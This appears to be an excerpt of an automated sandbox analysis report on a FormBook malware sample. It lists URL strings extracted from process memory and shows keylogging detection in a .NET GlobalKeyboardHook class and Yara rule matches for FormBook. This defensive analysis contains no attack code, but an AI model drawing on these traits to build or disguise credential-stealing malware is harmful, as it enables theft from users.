Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2156053333.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2350497797.0000000001C70000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351481307.0000000004330000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2151699678.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2161003996.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, vbc.exe, 00000005.00000002.2188294879.0000000000B82000.00000020.00020000.sdmp, svchost.exe, 00000007.00000002.2350236075.00000000005FC000.00000004.00000020.sdmp	String found in binary or memory: https://api.coinmarketcap.com/v1/ticker/
Source: vbc.exe, vbc.exe, 00000005.00000002.2188294879.0000000000B82000.00000020.00020000.sdmp, svchost.exe, 00000007.00000002.2350236075.00000000005FC000.00000004.00000020.sdmp	String found in binary or memory: https://coinmarketcap.com/api/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: vbc[1].exe.2.dr, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: vbc.exe.2.dr, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 4.2.vbc.exe.b80000.3.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 4.0.vbc.exe.b80000.0.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 5.2.vbc.exe.b80000.1.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 5.0.vbc.exe.b80000.0.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
